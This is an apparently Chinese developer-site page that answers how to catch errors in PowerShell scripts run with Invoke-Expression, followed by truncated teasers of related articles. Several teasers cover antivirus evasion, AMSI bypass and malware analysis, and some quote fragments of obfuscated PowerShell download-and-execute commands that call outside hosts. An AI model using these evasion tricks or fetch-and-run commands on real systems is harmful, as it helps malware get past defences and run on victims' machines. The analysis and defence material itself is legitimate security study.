如何在使用Invoke-Expression调用的Powershell脚本中捕获错误？

在使用Invoke-Expression调用的Powershell脚本中捕获错误，可以通过以下步骤实现：

使用Try-Catch语句块：在调用Invoke-Expression执行脚本的代码块周围包裹一个Try-Catch语句块，以便捕获可能发生的错误。

try {
    Invoke-Expression -Command "YourScript.ps1"
} catch {
    # 错误处理逻辑
}

捕获特定类型的错误：如果你只想捕获特定类型的错误，可以在Catch语句块中指定错误类型。

try {
    Invoke-Expression -Command "YourScript.ps1"
} catch [System.IO.IOException] {
    # 处理特定类型的错误
} catch {
    # 处理其他类型的错误
}

获取错误信息：在Catch语句块中，你可以使用$_变量来获取捕获到的错误对象，并从中提取有关错误的信息。

try {
    Invoke-Expression -Command "YourScript.ps1"
} catch {
    $errorMessage = $_.Exception.Message
    $errorStackTrace = $_.Exception.StackTrace
    # 处理错误信息
}

抛出自定义错误：如果你想在捕获到错误后抛出自定义错误，可以使用Throw语句。

try {
    Invoke-Expression -Command "YourScript.ps1"
} catch {
    Throw "自定义错误信息"
}

以上是在使用Invoke-Expression调用的Powershell脚本中捕获错误的方法。请注意，Powershell中还有其他处理错误的方式，如使用$ErrorActionPreference变量来设置错误处理策略，或使用Trap语句来捕获错误。具体使用哪种方式取决于你的需求和场景。

相关·内容

APT的思考: PowerShell命令混淆高级对抗

powershell的功能强大且调用方式十分灵活，目前大多数攻击者已经将PowerShell 应用在各种攻击场景中，如内网渗透，APT攻击甚至勒索软件中，在和各种组件，例如cmd,rundll32, 配合使用后...`n`n" -NoNewLine -ForegroundColor Green 在powershell解释器中的运行效果如下： ?...")).DownloadString("http://127.0.0.1:8899/qiye.txt") 1.4 空白在脚本中添加多余的空格是无关紧要的，不会影响脚本的运行,当然也不要乱填，不要影响正常的语法结构...简写与invoke 3.1 别名在powershell解释器中输入alias,看到所有的对象和函数的简写方式，也就是别名。常见的Invoke-Expression 可以使用 IEX来代替。 ?...编码 6.1 base64 在powershell命令行中,使用-EncodedCommand，而在脚本中使用FromBase64String IEX ([System.Text.Encoding]::

6.1K5 1

使用PowerShell自动部署ASP.NetCore程序到IIS

Windows PowerShell 是一种命令行外壳程序和脚本环境，使命令行用户和脚本编写者可以利用 .NET Framework的强大功能。...打开PowerShell 打开开始菜单，输入 PowerShell 进行搜索就可以看到它了 image.png WebAdministration 首先我们要引入PowerShell中的WebAdministration...:8080" 完整脚本以上是在用PowerShell部署到IIS时的关键命令，知道了这些就可以来写一个完整自动部署脚本了。...执行脚本执行脚本的方式很简单，可以在PowerShell的控制台中直接使用脚本的名称即可（注意路径） ..../ZKEACMS.ps1 或者可以直接鼠标右键该脚本文件，然后选择菜单中的使用 PowerShell 运行如果你的脚本在网络上，可以直接在控制台中使用以下脚本来运行而不用下载它，例如可以使用以下脚本来在线安装

3.4K17 0

Follina .html文件免杀

前言第一次尝试手动过杀软，成功与否全看运气，没有任何技术含量，仅做记录，标题带双引号是因为word并没有过静态的查杀正文在原始的样本中，是通过ms-msdt调用后，执行powershell ms-msdt.../Windows/System32/mpsigstub.exe IT_AutoTroubleshoot=ts_AUTO 在一键生成word的脚本follina.py中，生成的payload是这样的 ms-msdt.../Windows/System32/mpsigstub.exe" 通过对比上下两条，发现原始的样本中，删除执行的powershell后没查杀，而一键生成的则还是会被查于是将payload中的IT_RebrowseForFile...解析一下，Invoke-Expression()会将括号内的字符串当作powershell执行先看第二个Invoke-Expression()中的内容 '[System.Text.Encoding]'...，将YwBhAGwAYwA这串base64转成字符串，也就是calc，打开计算器的命令，但是上面的内容只是一串字符串而已，并不会执行，所以他是需要放在Invoke-Expression()中，我们放到powershell

7901 0

新年大礼包 | 新型Emotet变种重现江湖

当然了，这个文档将会引诱目标用户启用嵌入在其中的恶意宏：接下来的攻击步骤跟之前的Emotet活动类似：恶意宏会利用下列字符串作为参数并执行cmd.exe：脚本中包含了一些用于实现混淆处理的代码，用于在多个变量中隐藏字符串...“powershell”，攻击者对其进行了编译并会在攻击的下个阶段中执行这部分恶意代码。...在之前的Emotet攻击活动中，Payload代码中最开始是一段经过混淆处理的Invoke-Expression函数调用，后面跟着一个经过混淆处理的字符串，分析后我们发现这又是另一个恶意PowerShell...脚本：环境变量“comspec”中包含了指向cmd.exe的路径地址，并会通过字符串“iex”来调用Invoke-Expression：跟之前的Emotet攻击不同的是，Emotet Grinch选择使用三重...反混淆完成之后，下图所示的脚本代码将会在目标用户的主机系统中执行：在PowerShell脚本的初始阶段，它会从硬编码列表中的五个域名下载Emotet可执行Payload，并随机执行。

8956 0

渗透技巧 | Bypass Powershell执行策略的N种方式

1.是Windows原生的2.可以调用Windows API3.无文件执行命令4.可以逃避Anti-Virus的检测(这个其实现在还比较敏感了)5.被大多数程序加入白名单中，标记为可信的6.有许多开源的渗透工具集...•此执行策略设计用于将 PowerShell 脚本内置到更大应用程序中的配置，或用于将 PowerShell 作为具有自己的安全模型的程序的基础的配置。...当直接运行该脚本在Restricted(限制)执行策略的机器上时，会出现“此系统禁止运行脚本”的错误。...0x04 使用Invoke-Command或Invoke-Expression命令 Invoke-Command 通过交互式PowerShell控制台执行。...0x06 使用-EncodeCommand参数通过Unicode / Base64编码串这种方式加密脚本，可以绕过所有通过"Command"参数执行时会遇到的错误，算是一个Command的加强版。

3.3K2 0

无招胜有招：看我如何通过劫持COM服务器绕过AMSI

在这篇文章中，我们将阐述一种通过劫持COM服务器来绕过AMSI的方法，并分析Microsoft如何在build＃16232中修复该绕过，然后再讨论如何再次绕过微软对该漏洞的修复。...，AMSI接受了我们构造的恶意代码并将该代码块传递给被调用的Invoke-Expression。...现在我们可以看看微软如何在build＃16232中修复该漏洞。...在进行研究之前，我们需要明白的是：基本上，脚本解释器（如PowerShell）从工作目录加载amsi.dll，而不是从安全路径（如System32）加载它。...如您所见，现在正在查询注册表以查找AMSI的COM服务器：使用易受攻击的AMSI DLL，从图中可以看出我们现在可以执行COM服务器劫持：总结：尽管微软在补丁＃16232中对该漏洞进行了修复，但仍然可以通过使用旧的

2.7K7 0

Powershell免杀从入门到实践

前言在之前发布的一篇渗透技巧之Powershell实战思路中，学习了powershell在对抗Anti-Virus的方便和强大。...我们可以将两种方式混用来实现简单的bypass 如： echo Invoke-Expression(new-object net.webclient).downloadstring('http://xxx.xxx.xxx...处理powershell 利用cmd的混淆以不同的姿势调用powershell 如利用win10环境变量截取出powershell %psmodulepath:~24,10% 处理IEX 为IEX设置别名...而实际中可能更多的默认为cmd。我们可以先用socket一句话反弹powershell环境，再执行后续操作。...powershell加载器上面的脚本通过读取new.bin中的字节数组并在内存执行从而成功使cobalt strike上线。

2.7K3 0

powershell上对抗360与火绒的技巧

Down`loadString"('h'+'ttp://9821.ink/xxx') 同样可以使用在Net.Webclient上 Invoke-Expression(New-Object "`Ne`T...('http://9821.ink/xxx') 综合起来就成了最开始的上线命令： powershell set-alias -name kaspersky -value Invoke-Expression...我们可以看到，此时火绒发现了系统调用了powershell，立刻进行了拦截，那么我们就要修改powershell上线的命令，进行绕过达到上线。...为了突出文章目的，我们直接使用cs自带的提权EXP来达到system权限。 ? 我们直接在cs进行用户添加。...此时的思路可以使用cs中argue参数绕过杀软添加用户，#参数污染： net1 argue net1 xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx

1.4K3 0

“污水”（MuddyWater）APT组织C2工具MuddyC3浅析

作者竭力保证文章内容可靠，但对于任何错误、疏漏或不准确的内容希望能及时提出，以免误人子弟。...该APT组织显著的攻击行为特点为善于利用powershell等脚本后门，通过Powershell在内存中执行，减少新的PE文件在受害者机器落地，这种方式使的该组织的样本有着较低的检测率，另一方面也加大了安全机构的取证难度...工具由python2编写使用powershell来进行载荷投递使用hta与base64后的powershell代码来进行BypassAV 支持一对多服务载荷第一次启动时会收集目标系统信息，并发送回服务端...从远程位置下载恶意文件到受害者主机中，然后使用诸如Start-Porcess、Invoke-Item或者Invoke-Expression（-IEX）之类的命令执行恶意文件，PowerShell也可以将远程文件直接下载到受害者主机内存中...，然后从内存中执行。

9902 0

Windows 11和vscode终端美化

准备工作允许powershell执行脚本，如果不允许的话，后续执行安装命令会报错设置->隐私和安全性->开发者选项->powershell，点击应用一款 Nerd Font，Nerd Font字体中包含了很多特殊的图标...，如果不使用Nerd Font的话，后面设置了终端的主题后会乱码这里我以Hasklig字体为例，下载链接。...比如我想设置ys这个主题，只需要把上面命令中的jandedobbeleer.omp.json改成ys.omp.json就可以了。...它提供：语法着色简单语法错误通知良好的多线体验（编辑和历史）可定制的键绑定Cmd 和 emacs 模式（都没有完全实现，但都可以使用）许多配置选项Bash 样式完成（在 Cmd 模式下可选，在 Emacs...安装最新的 PowerShell，了解新功能和改进！

2.6K3 0

黑客在 Log4j 攻击中使用新的 PowerShell 后门

用于多项任务的模块化后门对 CVE-2021-44228 的利用会导致运行带有 base64 编码负载的 PowerShell 命令，最终从参与者控制的 Amazon S3 存储桶中获取“CharmPower...该核心模块可以执行以下主要功能：验证网络连接- 执行后，脚本通过使用参数 hi=hi 向 google.com 发出 HTTP POST 请求来等待活动的 Internet 连接。...基本系统枚举——该脚本收集 Windows 操作系统版本、计算机名称以及 $APPDATA 路径中的文件 Ni.txt 的内容；该文件可能由主模块下载的不同模块创建和填充。...C2发送的附加模块如下：应用程序– 枚举卸载注册表值并使用“wmic”命令确定受感染系统上安装了哪些应用程序。屏幕截图- 根据指定的频率捕获屏幕截图并使用硬编码凭据将它们上传到 FTP 服务器。...命令执行- 具有 Invoke-Expression、cmd 和 PowerShell 选项的远程命令执行模块。清理- 删除受感染系统中留下的所有痕迹的模块，例如注册表和启动文件夹条目、文件和进程。

6.9K1 0

五种免杀bypass火绒360姿势横向测评：哪款更适合你？

，经regsvr32测试可以使用再通过VS2019编译DLL加载器，该加载器将会把指定DLL（Dll1.dll）加载到指定进程（二）检测免杀在Kali机器上开启msf监听开启calc.exe...，获取其PID信息运行Project1.exe，Kali机器获取到Session，且火绒和360未报毒三、Shellcode加载器（一）python运行加载器将python脚本中的shellcode...四、Ladon免杀（Powershell混淆）（一）通过CS生成powershell的payload 当直接使用powershell运行，则会被火绒查杀（二）通过Ladon进行代码混淆使用...Ladon对Powershell代码进行混淆（三）检测免杀运行powershell脚本，发现CS成功上线，且没有被火绒和360告警五、无文件落地免杀（一）在Kali机器上部署恶意powershell...脚本（二）Windows机器远程获取执行，使用命令远程获取脚本执行 powershell set-alias -name kaspersky -value Invoke-Expression;kaspersky

3.2K5 0

一种 Powershell 的混淆方式绕过 AMSI 检测

另请注意，这种混淆不仅适用于有效载荷，而且您可以使用以下技术混淆现有工具，如 PowerSploit、PowerView 来规避 AV 和 EDR。这就是PowerShell 的美。...$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i) 6、iex是调用函数的 PowerShell...在这里，iex 在数据变量中执行代码，将其转换为字符串，而错误则重定向到空值，然后将其存储在 $sendback 变量中。...但是，如果我们把它们缝合在一起，那么脚本就作为一个有效负载，可以很容易地使用 YARA 或基于字符串的检测来检测。...现在同样，我们等待来自服务器的任何输入，在收到任何输入时，它使用 n-eiorvsxpk5执行命令，即 Invoke-Expression，将其转换为字节并发送回。

4.4K4 0

在windows中使用Oh My Posh美化你的终端PowerShell或WSL

在windows中使用Oh My Posh美化你的终端PowerShell或WSL 安装Windows terminal Windows 终端是一个新式主机应用程序，它面向你喜爱的命令行 shell，如命令提示符...配置 Oh My Posh 我们同样可以在window中配置自己想要的终端样式，接着看下面的操作：我们可以使用 Oh My Posh 自定义 PowerShell或适用于 Linux的 Windows...如果你用的是 PowerShell那么配置文件 C:\Users\ylyang\Documents\PowerShell\Microsoft.PowerShell_profile.ps1 如果看到路径错误...new-item -type file -path $profile -force 如果在尝试打开新的 PowerShell实例时收到脚本错误，则表明 PowerShell执行策略可能受到限制。...如果你的折腾的过程中遇到了相关的问题，可以在文章下面讨论，留言。

3651 0

PowerShell 7 使用 Oh My Posh 来美化命令行

安装 PowerShell 7 PowerShell 7 指的不是系统自带的 powershell ，而是新下载的(微软官方出品)，当然这个教程也适用于系统自带的 powershell 微软官方文档地址...view=powershell-7.2 下载地址：https://github.com/PowerShell/PowerShell/releases 下载安装字体文件请注意，一定要下载字体文件，尤其当你不知道你的字体文件是否支持美化后的某些字符时...字体安装 Oh My Posh 官方文档地址：https://ohmyposh.dev/ 最好在管理员模式下运行 powershell 下载安装，在 powershell 命令行中输入 winget...$Profile 文件中 oh-my-posh init pwsh | Invoke-Expression 应用修改，则直接在命令行中执行 ....$Profile ，如果出现错误等问题，请尝试关闭所有 powershell 命令窗口，重新打开，一般都会正常显示配置环境变量配置 POSH_THEMES_PATH 环境变量，最好配置成系统级别的，

1.8K2 0

无文件Powershell恶意程序使用DNS作为隐蔽信道

这在远程访问工具中相当罕见，而且隐蔽性较高。此恶意程序中使用了多阶段Powershell脚本，其中许多阶段都是完全无文件的，这就说明攻击者为了避开检测也是很努力的。...随后，“pre_logic”函数会解压第三阶段中用到的Powershell脚本，就是包含在该脚本当中的一个base64编码的blob。该函数还会定义后续阶段将用到的一些代码，包括函数调用和参数。...有点必须要注意的是，第三、四阶段的Powershell脚本，都包含两组域，只有在样本使用第二组域名出现问题时才会使用第一组域名。 ?...第三阶段Powershell脚本中的“Logic”函数会从脚本中的第二组域中随机选择一个C2域，并用这个域进行初始查找。...与第四阶段相关的代码随后会被清理并传递至Invoke-Expression Powershell cmdlet （IEX），并在第三阶段的语境中执行。

2.2K9 0

Windows terminal美化工具Oh-My-Posh

Oh My Posh 通常与不同的终端环境和 shell（如 Bash、Zsh 和 PowerShell）兼容，因此用户可以根据自己的喜好和需求配置终端提示符的外观和行为。...\jandedobbeleer.omp.json | Invoke-Expression 配置完之后，重启即可。...安装后，在Windows Terminal的设置-> Windows PowerShell ->外观中可以选择我们对应的字体：也可以直接编辑配置文件，打开Windows Terminal终端，按快捷键...选择一个自己的主题，如选择了gmay，那么只要修改Microsoft.PowerShell_profile.ps1文件中的主题内容即可： oh-my-posh init pwsh --config $env...:POSH_THEMES_PATH\gmay.omp.json | Invoke-Expression 修改后，重启即可。

3921 0

红队培训班作业 | 五种免杀bypass火绒360姿势横向测评：哪款更适合你？

，经regsvr32测试可以使用再通过VS2019编译DLL加载器，该加载器将会把指定DLL（Dll1.dll）加载到指定进程（二）检测免杀在Kali机器上开启msf监听开启calc.exe...，获取其PID信息运行Project1.exe，Kali机器获取到Session，且火绒和360未报毒三、Shellcode加载器（一）python运行加载器将python脚本中的shellcode...四、Ladon免杀（Powershell混淆）（一）通过CS生成powershell的payload 当直接使用powershell运行，则会被火绒查杀（二）通过Ladon进行代码混淆使用Ladon...对Powershell代码进行混淆（三）检测免杀运行powershell脚本，发现CS成功上线，且没有被火绒和360告警五、无文件落地免杀（一）在Kali机器上部署恶意powershell...脚本（二）Windows机器远程获取执行使用命令远程获取脚本执行 powershell set-alias -name kaspersky -value Invoke-Expression;kaspersky

1.5K4 0

做一个自动配置JDK环境变量的Powershell脚本

我的想法很简单，这个脚本应该在JDK安装程序执行完毕调用，从注册表获取JDK的安装位置，然后自动完成环境变量的配置。...然后我们寻找JDK的信息。这里我从我电脑的安装的JDK 8中截取了前一部分SE Development Kit作为查询字符串，不保证JDK 6和JDK 7的前一部分也和这一样。...如果需要创建用户或者系统级别的环境变量，需要调用.NET框架的方法。...|Select-Object -ExpandProperty content|Invoke-Expression 如果出现什么策略错误，可能是默认情况Powershell禁止运行远程脚本，允许就可以了。...所以使用的时候请注意，同时欢迎反馈信息。

1.7K5 0

Antimalware Scan Interface (AMSI)—反恶意软件扫描接口的绕过

『1』它通过在执行之前分析脚本来工作，以确定该脚本是否为恶意软件。此外，它旨在通过每个评估步骤中递归调用来检测混淆的恶意软件。...如果我们使用一个典型的混淆脚本，它们会在内存中自行解码和解压缩，直到准备好执行最终的有效负载为止。...原理：通过在每个代码评估点（如Invoke-Expression）被调用，AMSI可以检查原始的，模糊的脚本的中间版本和最终版本。以这种方式，避免初始的静态筛选的简单技术不再有效。...负责决定是否允许运行脚本的函数称为AmsiScanBuffer。『2』例如，PowerShell将在每次要评估任何PowerShell脚本时调用此函数。...这种bypass有多种版本，我将提交最新C＃版本嵌入在.ps1脚本中，该版本完全取自解码器的powershell。

2.1K2 0

点击加载更多

扫码

添加站长进交流群

领取专属 10元无门槛券

手把手带您无忧上云